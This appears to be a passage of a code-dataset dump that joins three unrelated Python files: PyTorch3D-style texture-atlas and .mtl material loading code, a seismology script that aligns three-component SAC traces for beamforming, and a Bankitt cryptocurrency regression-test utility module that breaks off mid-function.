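# texture_wrap="repeat" the integer part of a uv is dropped, so 1.25 samples
# at 0.25 and -0.5 samples at 0.5 (Python float modulo); with "clamp" the
# same uvs sample at 1.0 and 0.0 respectively.
#
#     uvs = torch.tensor([[[1.25, -0.5], [0.5, 0.5], [0.0, 1.0]]])
#     uvs % 1            # tensor([[[0.2500, 0.5000], ...]])
#     uvs.clamp(0., 1.)  # tensor([[[1.0000, 0.0000], ...]])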
def make_material_atlas(
image: torch.Tensor, faces_verts_uvs: torch.Tensor, texture_size: int
) -> torch.Tensor:
r"""
Given a single texture image and the uv coordinates for all the
face vertices, create a square texture map per face using
the formulation from [1].
For a triangle with vertices (v0, v1, v2) we can create a barycentric coordinate system
with the x axis being the vector (v0 - v2) and the y axis being the vector (v1 - v2).
The barycentric coordinates range from [0, 1] in the +x and +y direction so this creates
a triangular texture space with vertices at (0, 1), (0, 0) and (1, 0).
The per face texture map is of shape (texture_size, texture_size, 3)
which is a square. To map a triangular texture to a square grid, each
triangle is parametrized as follows (e.g. R = texture_size = 3):
The triangle texture is first divided into RxR = 9 subtriangles which each
map to one grid cell. The numbers in the grid cells and triangles show the mapping.
..code-block::python
Triangular Texture Space:
1
|\
|6 \
|____\
|\ 7 |\
|3 \ |4 \
|____\|____\
|\ 8 |\ 5 |\
|0 \ |1 \ |2 \
|____\|____\|____\
0 1
Square per face texture map:
R ____________________
| | | |
| 6 | 7 | 8 |
|______|______|______|
| | | |
| 3 | 4 | 5 |
|______|______|______|
| | | |
| 0 | 1 | 2 |
|______|______|______|
0 R
The barycentric coordinates of each grid cell are calculated using the
xy coordinates:
    .. code-block:: python
The cartesian coordinates are:
Grid 1:
R ____________________
| | | |
| 20 | 21 | 22 |
|______|______|______|
| | | |
| 10 | 11 | 12 |
|______|______|______|
| | | |
| 00 | 01 | 02 |
|______|______|______|
0 R
where 02 means y = 0, x = 2
Now consider this subset of the triangle which corresponds to
grid cells 0 and 8:
    .. code-block:: python
1/R ________
|\ 8 |
| \ |
| 0 \ |
|_______\|
0 1/R
The centroids of the triangles are:
0: (1/3, 1/3) * 1/R
8: (2/3, 2/3) * 1/R
For each grid cell we can now calculate the centroid `(c_y, c_x)`
of the corresponding texture triangle:
    - if `(x + y) < R`, then offset the centroid of
triangle 0 by `(y, x) * (1/R)`
- if `(x + y) > R`, then offset the centroid of
triangle 8 by `((R-1-y), (R-1-x)) * (1/R)`.
This is equivalent to updating the portion of Grid 1
    above the diagonal, replacing `(y, x)` with `((R-1-y), (R-1-x))`:
    .. code-block:: python
R _____________________
| | | |
| 20 | 01 | 00 |
|______|______|______|
| | | |
| 10 | 11 | 10 |
|______|______|______|
| | | |
| 00 | 01 | 02 |
|______|______|______|
0 R
The barycentric coordinates (w0, w1, w2) are then given by:
    .. code-block:: python
w0 = c_x
w1 = c_y
w2 = 1- w0 - w1
Args:
image: FloatTensor of shape (H, W, 3)
faces_verts_uvs: uv coordinates for each vertex in each face (F, 3, 2)
texture_size: int
Returns:
atlas: a FloatTensor of shape (F, texture_size, texture_size, 3) giving a
per face texture map.
[1] Liu et al, 'Soft Rasterizer: A Differentiable Renderer for Image-based
3D Reasoning', ICCV 2019
"""
R = texture_size
device = faces_verts_uvs.device
rng = torch.arange(R, device=device)
# Meshgrid returns (row, column) i.e (Y, X)
# Change order to (X, Y) to make the grid.
Y, X = torch.meshgrid(rng, rng)
# pyre-fixme[28]: Unexpected keyword argument `axis`.
grid = torch.stack([X, Y], axis=-1) # (R, R, 2)
# Grid cells below the diagonal: x + y < R.
below_diag = grid.sum(-1) < R
# map a [0, R] grid -> to a [0, 1] barycentric coordinates of
# the texture triangle centroids.
bary = torch.zeros((R, R, 3), device=device) # (R, R, 3)
slc = torch.arange(2, device=device)[:, None]
# w0, w1
bary[below_diag, slc] = ((grid[below_diag] + 1.0 / 3.0) / R).T
# w0, w1 for above diagonal grid cells.
# pyre-fixme[16]: `float` has no attribute `T`.
bary[~below_diag, slc] = (((R - 1.0 - grid[~below_diag]) + 2.0 / 3.0) / R).T
# w2 = 1. - w0 - w1
bary[..., -1] = 1 - bary[..., :2].sum(dim=-1)
# Calculate the uv position in the image for each pixel
# in the per face texture map
# (F, 1, 1, 3, 2) * (R, R, 3, 1) -> (F, R, R, 3, 2) -> (F, R, R, 2)
uv_pos = (faces_verts_uvs[:, None, None] * bary[..., None]).sum(-2)
# bi-linearly interpolate the textures from the images
# using the uv coordinates given by uv_pos.
textures = _bilinear_interpolation_vectorized(image, uv_pos)
return textures
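# Illustrative example (not from the library's tests): with R = 2 and one
# face whose uvs span the unit triangle, each of the 2x2 texels is filled by
# bilinearly sampling `image` at the centroid of its sub-triangle:
#
#     img = torch.rand(8, 8, 3)
#     uvs = torch.tensor([[[0.0, 0.0], [1.0, 0.0], [0.0, 1.0]]])  # (1, 3, 2)
#     atlas = make_material_atlas(img, uvs, texture_size=2)       # (1, 2, 2, 3)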
def _bilinear_interpolation_vectorized(
image: torch.Tensor, grid: torch.Tensor
) -> torch.Tensor:
"""
    Bilinearly interpolate the image using the uv positions in the flow-field
grid (following the naming conventions for torch.nn.functional.grid_sample).
This implementation uses the same steps as in the SoftRas cuda kernel
to make it easy to compare. This vectorized version requires less memory than
_bilinear_interpolation_grid_sample but is slightly slower.
If speed is an issue and the number of faces in the mesh and texture image sizes
are small, consider using _bilinear_interpolation_grid_sample instead.
Args:
image: FloatTensor of shape (H, W, D) a single image/input tensor with D
channels.
grid: FloatTensor of shape (N, R, R, 2) giving the pixel locations of the
points at which to sample a value in the image. The grid values must
be in the range [0, 1]. u is the x direction and v is the y direction.
Returns:
out: FloatTensor of shape (N, H, W, D) giving the interpolated
D dimensional value from image at each of the pixel locations in grid.
"""
H, W, _ = image.shape
# Convert [0, 1] to the range [0, W-1] and [0, H-1]
grid = grid * torch.tensor([W - 1, H - 1]).type_as(grid)
weight_1 = grid - grid.int()
weight_0 = 1.0 - weight_1
grid_x, grid_y = grid.unbind(-1)
y0 = grid_y.to(torch.int64)
y1 = (grid_y + 1).to(torch.int64)
x0 = grid_x.to(torch.int64)
x1 = x0 + 1
weight_x0, weight_y0 = weight_0.unbind(-1)
weight_x1, weight_y1 = weight_1.unbind(-1)
# Bi-linear interpolation
    # grid positions = [[y, x],     [(y+1), x],
    #                   [y, (x+1)], [(y+1), (x+1)]]
# weights = [[wx0*wy0, wx0*wy1],
# [wx1*wy0, wx1*wy1]]
out = (
image[y0, x0] * (weight_x0 * weight_y0)[..., None]
+ image[y1, x0] * (weight_x0 * weight_y1)[..., None]
+ image[y0, x1] * (weight_x1 * weight_y0)[..., None]
+ image[y1, x1] * (weight_x1 * weight_y1)[..., None]
)
return out
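# Worked example (illustrative): sampling a 2x2 single-channel image at the
# center of the unit square averages all four texels:
#
#     img = torch.tensor([[[0.], [1.]], [[2.], [3.]]])  # (H, W, D) = (2, 2, 1)
#     g = torch.full((1, 1, 1, 2), 0.5)                 # one sample at uv = (0.5, 0.5)
#     _bilinear_interpolation_vectorized(img, g)        # -> value 1.5, shape (1, 1, 1, 1)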
def _bilinear_interpolation_grid_sample(
image: torch.Tensor, grid: torch.Tensor
) -> torch.Tensor:
"""
    Bilinearly interpolate the image using the uv positions in the flow-field
grid (following the conventions for torch.nn.functional.grid_sample).
This implementation is faster than _bilinear_interpolation_vectorized but
requires more memory so can cause OOMs. If speed is an issue try this function
instead.
Args:
image: FloatTensor of shape (H, W, D) a single image/input tensor with D
channels.
grid: FloatTensor of shape (N, R, R, 2) giving the pixel locations of the
points at which to sample a value in the image. The grid values must
be in the range [0, 1]. u is the x direction and v is the y direction.
Returns:
out: FloatTensor of shape (N, H, W, D) giving the interpolated
D dimensional value from image at each of the pixel locations in grid.
"""
N = grid.shape[0]
# convert [0, 1] to the range [-1, 1] expected by grid_sample.
grid = grid * 2.0 - 1.0
image = image.permute(2, 0, 1)[None, ...].expand(N, -1, -1, -1) # (N, 3, H, W)
# Align_corners has to be set to True to match the output of the SoftRas
# cuda kernel for bilinear sampling.
out = F.grid_sample(image, grid, mode="bilinear", align_corners=True)
return out.permute(0, 2, 3, 1)
MaterialProperties = Dict[str, Dict[str, torch.Tensor]]
TextureFiles = Dict[str, str]
TextureImages = Dict[str, torch.Tensor]
def _parse_mtl(f, device="cpu") -> Tuple[MaterialProperties, TextureFiles]:
material_properties = {}
texture_files = {}
material_name = ""
with _open_file(f, "r") as f:
for line in f:
tokens = line.strip().split()
if not tokens:
continue
if tokens[0] == "newmtl":
material_name = tokens[1]
material_properties[material_name] = {}
elif tokens[0] == "map_Kd":
# Diffuse texture map
# Account for the case where filenames might have spaces
filename = line.strip()[7:]
texture_files[material_name] = filename
elif tokens[0] == "Kd":
# RGB diffuse reflectivity
kd = np.array(tokens[1:4]).astype(np.float32)
kd = torch.from_numpy(kd).to(device)
material_properties[material_name]["diffuse_color"] = kd
elif tokens[0] == "Ka":
# RGB ambient reflectivity
ka = np.array(tokens[1:4]).astype(np.float32)
ka = torch.from_numpy(ka).to(device)
material_properties[material_name]["ambient_color"] = ka
elif tokens[0] == "Ks":
# RGB specular reflectivity
ks = np.array(tokens[1:4]).astype(np.float32)
ks = torch.from_numpy(ks).to(device)
material_properties[material_name]["specular_color"] = ks
elif tokens[0] == "Ns":
# Specular exponent
ns = np.array(tokens[1:4]).astype(np.float32)
ns = torch.from_numpy(ns).to(device)
material_properties[material_name]["shininess"] = ns
return material_properties, texture_files
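# For reference, a minimal .mtl fragment of the kind this parser handles
# (a hypothetical example, not shipped with the library):
#
#     newmtl material_1
#     Ka 0.2 0.2 0.2
#     Kd 0.8 0.8 0.8
#     Ks 0.0 0.0 0.0
#     Ns 10.0
#     map_Kd texture.png
#
# parses to material_properties["material_1"] holding ambient_color,
# diffuse_color, specular_color and shininess tensors, and
# texture_files == {"material_1": "texture.png"}.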
def _load_texture_images(
material_names: List[str],
data_dir: str,
material_properties: MaterialProperties,
texture_files: TextureFiles,
) -> Tuple[MaterialProperties, TextureImages]:
final_material_properties = {}
texture_images = {}
# Only keep the materials referenced in the obj.
for material_name in material_names:
if material_name in texture_files:
# Load the texture image.
path = os.path.join(data_dir, texture_files[material_name])
if os.path.isfile(path):
image = _read_image(path, format="RGB") / 255.0
image = torch.from_numpy(image)
texture_images[material_name] = image
else:
msg = f"Texture file does not exist: {path}"
warnings.warn(msg)
if material_name in material_properties:
final_material_properties[material_name] = material_properties[
material_name
]
return final_material_properties, texture_images
def load_mtl(
f, material_names: List[str], data_dir: str, device="cpu"
) -> Tuple[MaterialProperties, TextureImages]:
"""
Load texture images and material reflectivity values for ambient, diffuse
and specular light (Ka, Kd, Ks, Ns).
Args:
f: a file-like object of the material information.
material_names: a list of the material names found in the .obj file.
data_dir: the directory where the material texture files are located.
Returns:
material_properties: dict of properties for each material. If a material
does not have any properties it will have an empty dict.
{
material_name_1: {
"ambient_color": tensor of shape (1, 3),
"diffuse_color": tensor of shape (1, 3),
"specular_color": tensor of shape (1, 3),
"shininess": tensor of shape (1)
},
material_name_2: {},
...
}
texture_images: dict of material names and texture images
{
material_name_1: (H, W, 3) image,
...
}
"""
material_properties, texture_files = _parse_mtl(f, device)
return _load_texture_images(
material_names, data_dir, material_properties, texture_files
)
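# Hedged usage sketch ("model.mtl" and the material name are hypothetical;
# material_names would normally come from the parsed .obj):
#
#     with open("model.mtl") as f:
#         props, images = load_mtl(
#             f, material_names=["material_1"], data_dir=".", device="cpu"
#         )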
| [
"[email protected]"
] | |
dbbdd80325b36ade3a92fc51452029f8d9e7b58e | d4ca03693383a5bc20bcdf7b7d552bba1d5467ff | /prepare_3comp.py | c3f7453dccf62501b6eac3430daf838f8eb00c62 | [] | no_license | samhaug/beamform_code | abaa1c723fec6143523b4bf8c05e7daa2655584d | 3bb201356056c1ee91a141b057ff7c666171de2a | refs/heads/master | 2023-01-19T22:15:02.272484 | 2020-11-24T23:05:47 | 2020-11-24T23:05:47 | 289,100,877 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,717 | py | import obspy
from os.path import isdir
from subprocess import call
from obspy.taup import TauPyModel
import numpy as np
from matplotlib import pyplot as plt
model = TauPyModel(model='prem')
if not isdir("./z_comp"):
call("mkdir ./z_comp",shell=True)
if not isdir("./e_comp"):
call("mkdir ./e_comp",shell=True)
if not isdir("./n_comp"):
call("mkdir ./n_comp",shell=True)
print('reading')
z = obspy.read('data/*BHZ*')
n = obspy.read('data/*BHN*')
e = obspy.read('data/*BHE*')
print('read')
z_l = []
n_l = []
e_l = []
all_l = []
z.interpolate(6)
n.interpolate(6)
e.interpolate(6)
#z.filter('bandpass',freqmin=1/100.,freqmax=1./5,zerophase=True)
#n.filter('bandpass',freqmin=1/100.,freqmax=1./5,zerophase=True)
#e.filter('bandpass',freqmin=1/100.,freqmax=1./5,zerophase=True)
z.detrend()
n.detrend()
e.detrend()
# Trim data to numsamp samples. Remove shorter traces
numsamp=3882
z_netw=[]
z_stat=[]
z_loc=[]
for idx,tr in enumerate(z):
z[idx].data = z[idx].data[0:numsamp]
if len(z[idx].data) != numsamp:
z_stat.append(z[idx].stats.station)
z_netw.append(z[idx].stats.network)
z_loc.append(z[idx].stats.location)
for ii in range(0,len(z_netw)):
z.remove(z.select(station=z_stat[ii],network=z_netw[ii],location=z_loc[ii])[0])
n_netw=[]
n_stat=[]
n_loc=[]
for idx,tr in enumerate(n):
n[idx].data = n[idx].data[0:numsamp]
if len(n[idx].data) != numsamp:
n_stat.append(n[idx].stats.station)
n_netw.append(n[idx].stats.network)
n_loc.append(n[idx].stats.location)
for ii in range(0,len(n_netw)):
n.remove(n.select(station=n_stat[ii],network=n_netw[ii],location=n_loc[ii])[0])
e_netw=[]
e_stat=[]
e_loc=[]
for idx,tr in enumerate(e):
e[idx].data = e[idx].data[0:numsamp]
if len(tr.data) != numsamp:
e_stat.append(e[idx].stats.station)
e_netw.append(e[idx].stats.network)
e_loc.append(e[idx].stats.location)
for ii in range(0,len(e_netw)):
e.remove(e.select(station=e_stat[ii],network=e_netw[ii],location=e_loc[ii])[0])
#Remove duplicates
for tr in z:
name = "{}_{}_{}".format(tr.stats.network,tr.stats.station,tr.stats.location)
if name not in z_l:
z_l.append(name)
else:
z.remove(tr)
for tr in n:
name = "{}_{}_{}".format(tr.stats.network,tr.stats.station,tr.stats.location)
if name not in n_l:
n_l.append(name)
else:
n.remove(tr)
for tr in e:
name = "{}_{}_{}".format(tr.stats.network,tr.stats.station,tr.stats.location)
if name not in e_l:
e_l.append(name)
else:
e.remove(tr)
z_l = []
n_l = []
e_l = []
all_l = []
#Make list of each trace
for tr in z:
z_l.append("{}_{}_{}".format(tr.stats.network,tr.stats.station,tr.stats.location))
all_l.append("{}_{}_{}".format(tr.stats.network,tr.stats.station,tr.stats.location))
for tr in n:
n_l.append("{}_{}_{}".format(tr.stats.network,tr.stats.station,tr.stats.location))
all_l.append("{}_{}_{}".format(tr.stats.network,tr.stats.station,tr.stats.location))
for tr in e:
e_l.append("{}_{}_{}".format(tr.stats.network,tr.stats.station,tr.stats.location))
all_l.append("{}_{}_{}".format(tr.stats.network,tr.stats.station,tr.stats.location))
#Remove traces not common to all three components
for i in (set(all_l)-set(z_l)):
try:
for tr in n.select(network=i.split('_')[0],station=i.split('_')[1],location=i.split('_')[2]):
n.remove(tr)
except:
pass
try:
for tr in e.select(network=i.split('_')[0],station=i.split('_')[1],location=i.split('_')[2]):
e.remove(tr)
except:
continue
for i in (set(all_l)-set(n_l)):
try:
for tr in z.select(network=i.split('_')[0],station=i.split('_')[1],location=i.split('_')[2]):
z.remove(tr)
except:
pass
try:
for tr in e.select(network=i.split('_')[0],station=i.split('_')[1],location=i.split('_')[2]):
e.remove(tr)
except:
pass
for i in (set(all_l)-set(e_l)):
try:
for tr in n.select(network=i.split('_')[0],station=i.split('_')[1],location=i.split('_')[2]):
n.remove(tr)
except:
pass
try:
for tr in z.select(network=i.split('_')[0],station=i.split('_')[1],location=i.split('_')[2]):
z.remove(tr)
except:
pass
z.sort(['network','station','location'])
n.sort(['network','station','location'])
e.sort(['network','station','location'])
#print("Aligning on P")
#for idx,tr in enumerate(z):
# gcarc = tr.stats.sac['gcarc']
# if tr.stats.sac['evdp'] > 1000:
# tr.stats.sac['evdp'] *= 1/1000.
# h = tr.stats.sac['evdp']
# t = model.get_travel_times(source_depth_in_km=h,
# distance_in_degree=gcarc,
# phase_list=['ttp'])[0].time
# s = tr.stats.sampling_rate
# w = tr.data[int((t-20)*s):int((t+20)*s)]
# l = int(len(w)/2.)
# p1 = np.argmax(np.abs(w))
# z[idx].data = np.roll(z[idx].data,l-p1)
# e[idx].data = np.roll(e[idx].data,l-p1)
# n[idx].data = np.roll(n[idx].data,l-p1)
#z.differentiate()
#n.differentiate()
#e.differentiate()
for tr in z:
tr.write('z_comp/{}_{}_{}.sac'.format(tr.stats.network,tr.stats.station,tr.stats.location),format='SAC')
for tr in n:
if tr.stats.sac['evdp'] > 1000:
tr.stats.sac['evdp'] *= 1/1000.
tr.write('n_comp/{}_{}_{}.sac'.format(tr.stats.network,tr.stats.station,tr.stats.location),format='SAC')
for tr in e:
if tr.stats.sac['evdp'] > 1000:
tr.stats.sac['evdp'] *= 1/1000.
tr.write('e_comp/{}_{}_{}.sac'.format(tr.stats.network,tr.stats.station,tr.stats.location),format='SAC')
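# The three directories now hold equal-length, station-matched SAC files.
# A downstream beamforming step could read them back with, for example
# (illustrative only):
#
#     z = obspy.read('z_comp/*.sac')
#     n = obspy.read('n_comp/*.sac')
#     e = obspy.read('e_comp/*.sac')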
| [
"[email protected]"
] | |
4657907d92c2d3cfce0d9eba8af849e653c57d19 | fd9d43f9a2826c1c985472d1067317c8d399d3e2 | /qa/rpc-tests/test_framework/util.py | ed2771d4601b389047fc4c84faef3b5ffeda8fc0 | [
"MIT"
] | permissive | Bankitt-Official/bankitt | 006cd394c202ad1f58d253fc4fc2f8c4d1db03a0 | ba6ec5c2d7099eeafab972634e9dddd676b0503f | refs/heads/master | 2020-03-07T11:08:23.628577 | 2018-06-09T09:40:25 | 2018-06-09T09:40:25 | 127,448,326 | 0 | 1 | MIT | 2018-05-12T06:14:49 | 2018-03-30T16:16:35 | C++ | UTF-8 | Python | false | false | 21,631 | py | # Copyright (c) 2014-2015 The Bitcoin Core developers
# Copyright (c) 2014-2017 The Bankitt Core developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Helpful routines for regression testing
#
# Add python-bitcoinrpc to module search path:
import os
import sys
from binascii import hexlify, unhexlify
from base64 import b64encode
from decimal import Decimal, ROUND_DOWN
import json
import random
import shutil
import subprocess
import time
import re
import errno
from . import coverage
from .authproxy import AuthServiceProxy, JSONRPCException
COVERAGE_DIR = None
#Set Mocktime default to OFF.
#MOCKTIME is only needed for scripts that use the
#cached version of the blockchain. If the cached
#version of the blockchain is used without MOCKTIME
#then the mempools will not sync due to IBD.
MOCKTIME = 0
def enable_mocktime():
    #For backward compatibility of the python scripts
#with previous versions of the cache, set MOCKTIME
#to regtest genesis time + (201 * 156)
global MOCKTIME
MOCKTIME = 1417713337 + (201 * 156)
def disable_mocktime():
global MOCKTIME
MOCKTIME = 0
def get_mocktime():
return MOCKTIME
def enable_coverage(dirname):
"""Maintain a log of which RPC calls are made during testing."""
global COVERAGE_DIR
COVERAGE_DIR = dirname
def get_rpc_proxy(url, node_number, timeout=None):
"""
Args:
url (str): URL of the RPC server to call
node_number (int): the node number (or id) that this calls to
Kwargs:
timeout (int): HTTP timeout in seconds
Returns:
AuthServiceProxy. convenience object for making RPC calls.
"""
proxy_kwargs = {}
if timeout is not None:
proxy_kwargs['timeout'] = timeout
proxy = AuthServiceProxy(url, **proxy_kwargs)
proxy.url = url # store URL on proxy for info
coverage_logfile = coverage.get_filename(
COVERAGE_DIR, node_number) if COVERAGE_DIR else None
return coverage.AuthServiceProxyWrapper(proxy, coverage_logfile)
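# Example (illustrative): connect to node 0 on localhost and query it.
#
#   node0 = get_rpc_proxy(rpc_url(0), 0, timeout=30)
#   height = node0.getblockcount()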
def get_mnsync_status(node):
result = node.mnsync("status")
return result['IsSynced']
def wait_to_sync(node):
synced = False
while not synced:
synced = get_mnsync_status(node)
time.sleep(0.5)
def p2p_port(n):
return 11000 + n + os.getpid()%999
def rpc_port(n):
return 12000 + n + os.getpid()%999
def check_json_precision():
"""Make sure json library being used does not lose precision converting BTC values"""
n = Decimal("20000000.00000003")
satoshis = int(json.loads(json.dumps(float(n)))*1.0e8)
if satoshis != 2000000000000003:
raise RuntimeError("JSON encode/decode loses precision")
def count_bytes(hex_string):
return len(bytearray.fromhex(hex_string))
def bytes_to_hex_str(byte_str):
return hexlify(byte_str).decode('ascii')
def hex_str_to_bytes(hex_str):
return unhexlify(hex_str.encode('ascii'))
def str_to_b64str(string):
return b64encode(string.encode('utf-8')).decode('ascii')
def sync_blocks(rpc_connections, wait=1):
"""
Wait until everybody has the same block count
"""
while True:
counts = [ x.getblockcount() for x in rpc_connections ]
if counts == [ counts[0] ]*len(counts):
break
time.sleep(wait)
def sync_mempools(rpc_connections, wait=1):
"""
Wait until everybody has the same transactions in their memory
pools
"""
while True:
pool = set(rpc_connections[0].getrawmempool())
num_match = 1
for i in range(1, len(rpc_connections)):
if set(rpc_connections[i].getrawmempool()) == pool:
num_match = num_match+1
if num_match == len(rpc_connections):
break
time.sleep(wait)
def sync_masternodes(rpc_connections):
for node in rpc_connections:
wait_to_sync(node)
bitcoind_processes = {}
def initialize_datadir(dirname, n):
datadir = os.path.join(dirname, "node"+str(n))
if not os.path.isdir(datadir):
os.makedirs(datadir)
with open(os.path.join(datadir, "bankitt.conf"), 'w') as f:
f.write("regtest=1\n")
f.write("rpcuser=rt\n")
f.write("rpcpassword=rt\n")
f.write("port="+str(p2p_port(n))+"\n")
f.write("rpcport="+str(rpc_port(n))+"\n")
f.write("listenonion=0\n")
return datadir
def rpc_url(i, rpchost=None):
return "http://rt:rt@%s:%d" % (rpchost or '127.0.0.1', rpc_port(i))
def wait_for_bitcoind_start(process, url, i):
'''
Wait for bankittd to start. This means that RPC is accessible and fully initialized.
Raise an exception if bankittd exits during initialization.
'''
while True:
if process.poll() is not None:
raise Exception('bankittd exited with status %i during initialization' % process.returncode)
try:
rpc = get_rpc_proxy(url, i)
blocks = rpc.getblockcount()
break # break out of loop on success
except IOError as e:
if e.errno != errno.ECONNREFUSED: # Port not yet open?
raise # unknown IO error
except JSONRPCException as e: # Initialization phase
if e.error['code'] != -28: # RPC in warmup?
                raise # unknown JSON RPC exception
time.sleep(0.25)
def initialize_chain(test_dir):
"""
Create (or copy from cache) a 200-block-long chain and
4 wallets.
"""
if (not os.path.isdir(os.path.join("cache","node0"))
or not os.path.isdir(os.path.join("cache","node1"))
or not os.path.isdir(os.path.join("cache","node2"))
or not os.path.isdir(os.path.join("cache","node3"))):
#find and delete old cache directories if any exist
for i in range(4):
if os.path.isdir(os.path.join("cache","node"+str(i))):
shutil.rmtree(os.path.join("cache","node"+str(i)))
# Create cache directories, run bankittds:
for i in range(4):
datadir=initialize_datadir("cache", i)
args = [ os.getenv("BANKITTD", "bankittd"), "-server", "-keypool=1", "-datadir="+datadir, "-discover=0" ]
if i > 0:
args.append("-connect=127.0.0.1:"+str(p2p_port(0)))
bitcoind_processes[i] = subprocess.Popen(args)
if os.getenv("PYTHON_DEBUG", ""):
print "initialize_chain: bankittd started, waiting for RPC to come up"
wait_for_bitcoind_start(bitcoind_processes[i], rpc_url(i), i)
if os.getenv("PYTHON_DEBUG", ""):
            print "initialize_chain: RPC successfully started"
rpcs = []
for i in range(4):
try:
rpcs.append(get_rpc_proxy(rpc_url(i), i))
except:
                sys.stderr.write("Error connecting to "+rpc_url(i)+"\n")
sys.exit(1)
# Create a 200-block-long chain; each of the 4 nodes
# gets 25 mature blocks and 25 immature.
# blocks are created with timestamps 156 seconds apart
# starting from 31356 seconds in the past
enable_mocktime()
block_time = get_mocktime() - (201 * 156)
for i in range(2):
for peer in range(4):
for j in range(25):
set_node_times(rpcs, block_time)
rpcs[peer].generate(1)
block_time += 156
# Must sync before next peer starts generating blocks
sync_blocks(rpcs)
# Shut them down, and clean up cache directories:
stop_nodes(rpcs)
wait_bitcoinds()
disable_mocktime()
for i in range(4):
os.remove(log_filename("cache", i, "debug.log"))
os.remove(log_filename("cache", i, "db.log"))
os.remove(log_filename("cache", i, "peers.dat"))
os.remove(log_filename("cache", i, "fee_estimates.dat"))
for i in range(4):
from_dir = os.path.join("cache", "node"+str(i))
to_dir = os.path.join(test_dir, "node"+str(i))
shutil.copytree(from_dir, to_dir)
initialize_datadir(test_dir, i) # Overwrite port/rpcport in bankitt.conf
def initialize_chain_clean(test_dir, num_nodes):
"""
Create an empty blockchain and num_nodes wallets.
Useful if a test case wants complete control over initialization.
"""
for i in range(num_nodes):
datadir=initialize_datadir(test_dir, i)
def _rpchost_to_args(rpchost):
'''Convert optional IP:port spec to rpcconnect/rpcport args'''
if rpchost is None:
return []
match = re.match('(\[[0-9a-fA-f:]+\]|[^:]+)(?::([0-9]+))?$', rpchost)
if not match:
raise ValueError('Invalid RPC host spec ' + rpchost)
rpcconnect = match.group(1)
rpcport = match.group(2)
if rpcconnect.startswith('['): # remove IPv6 [...] wrapping
rpcconnect = rpcconnect[1:-1]
rv = ['-rpcconnect=' + rpcconnect]
if rpcport:
rv += ['-rpcport=' + rpcport]
return rv
def start_node(i, dirname, extra_args=None, rpchost=None, timewait=None, binary=None):
"""
Start a bankittd and return RPC connection to it
"""
datadir = os.path.join(dirname, "node"+str(i))
if binary is None:
binary = os.getenv("BANKITTD", "bankittd")
# RPC tests still depend on free transactions
args = [ binary, "-datadir="+datadir, "-server", "-keypool=1", "-discover=0", "-rest", "-blockprioritysize=50000", "-mocktime="+str(get_mocktime()) ]
if extra_args is not None: args.extend(extra_args)
bitcoind_processes[i] = subprocess.Popen(args)
if os.getenv("PYTHON_DEBUG", ""):
print "start_node: bankittd started, waiting for RPC to come up"
url = rpc_url(i, rpchost)
wait_for_bitcoind_start(bitcoind_processes[i], url, i)
if os.getenv("PYTHON_DEBUG", ""):
        print "start_node: RPC successfully started"
proxy = get_rpc_proxy(url, i, timeout=timewait)
if COVERAGE_DIR:
coverage.write_all_rpc_commands(COVERAGE_DIR, proxy)
return proxy
def start_nodes(num_nodes, dirname, extra_args=None, rpchost=None, binary=None):
"""
Start multiple bankittds, return RPC connections to them
"""
if extra_args is None: extra_args = [ None for i in range(num_nodes) ]
if binary is None: binary = [ None for i in range(num_nodes) ]
rpcs = []
try:
for i in range(num_nodes):
rpcs.append(start_node(i, dirname, extra_args[i], rpchost, binary=binary[i]))
except: # If one node failed to start, stop the others
stop_nodes(rpcs)
raise
return rpcs
def log_filename(dirname, n_node, logname):
return os.path.join(dirname, "node"+str(n_node), "regtest", logname)
def stop_node(node, i):
node.stop()
bitcoind_processes[i].wait()
del bitcoind_processes[i]
def stop_nodes(nodes):
for node in nodes:
node.stop()
del nodes[:] # Emptying array closes connections as a side effect
def set_node_times(nodes, t):
for node in nodes:
node.setmocktime(t)
def wait_bitcoinds():
# Wait for all bitcoinds to cleanly exit
for bitcoind in bitcoind_processes.values():
bitcoind.wait()
bitcoind_processes.clear()
def connect_nodes(from_connection, node_num):
ip_port = "127.0.0.1:"+str(p2p_port(node_num))
from_connection.addnode(ip_port, "onetry")
# poll until version handshake complete to avoid race conditions
# with transaction relaying
while any(peer['version'] == 0 for peer in from_connection.getpeerinfo()):
time.sleep(0.1)
def connect_nodes_bi(nodes, a, b):
connect_nodes(nodes[a], b)
connect_nodes(nodes[b], a)
def find_output(node, txid, amount):
"""
Return index to output of txid with value amount
Raises exception if there is none.
"""
txdata = node.getrawtransaction(txid, 1)
for i in range(len(txdata["vout"])):
if txdata["vout"][i]["value"] == amount:
return i
raise RuntimeError("find_output txid %s : %s not found"%(txid,str(amount)))
def gather_inputs(from_node, amount_needed, confirmations_required=1):
"""
Return a random set of unspent txouts that are enough to pay amount_needed
"""
assert(confirmations_required >=0)
utxo = from_node.listunspent(confirmations_required)
random.shuffle(utxo)
inputs = []
total_in = Decimal("0.00000000")
while total_in < amount_needed and len(utxo) > 0:
t = utxo.pop()
total_in += t["amount"]
inputs.append({ "txid" : t["txid"], "vout" : t["vout"], "address" : t["address"] } )
if total_in < amount_needed:
raise RuntimeError("Insufficient funds: need %d, have %d"%(amount_needed, total_in))
return (total_in, inputs)
def make_change(from_node, amount_in, amount_out, fee):
"""
Create change output(s), return them
"""
outputs = {}
amount = amount_out+fee
change = amount_in - amount
if change > amount*2:
# Create an extra change output to break up big inputs
change_address = from_node.getnewaddress()
# Split change in two, being careful of rounding:
outputs[change_address] = Decimal(change/2).quantize(Decimal('0.00000001'), rounding=ROUND_DOWN)
change = amount_in - amount - outputs[change_address]
if change > 0:
outputs[from_node.getnewaddress()] = change
return outputs
def send_zeropri_transaction(from_node, to_node, amount, fee):
"""
Create&broadcast a zero-priority transaction.
Returns (txid, hex-encoded-txdata)
Ensures transaction is zero-priority by first creating a send-to-self,
then using its output
"""
# Create a send-to-self with confirmed inputs:
self_address = from_node.getnewaddress()
(total_in, inputs) = gather_inputs(from_node, amount+fee*2)
outputs = make_change(from_node, total_in, amount+fee, fee)
outputs[self_address] = float(amount+fee)
self_rawtx = from_node.createrawtransaction(inputs, outputs)
self_signresult = from_node.signrawtransaction(self_rawtx)
self_txid = from_node.sendrawtransaction(self_signresult["hex"], True)
vout = find_output(from_node, self_txid, amount+fee)
# Now immediately spend the output to create a 1-input, 1-output
# zero-priority transaction:
inputs = [ { "txid" : self_txid, "vout" : vout } ]
outputs = { to_node.getnewaddress() : float(amount) }
rawtx = from_node.createrawtransaction(inputs, outputs)
signresult = from_node.signrawtransaction(rawtx)
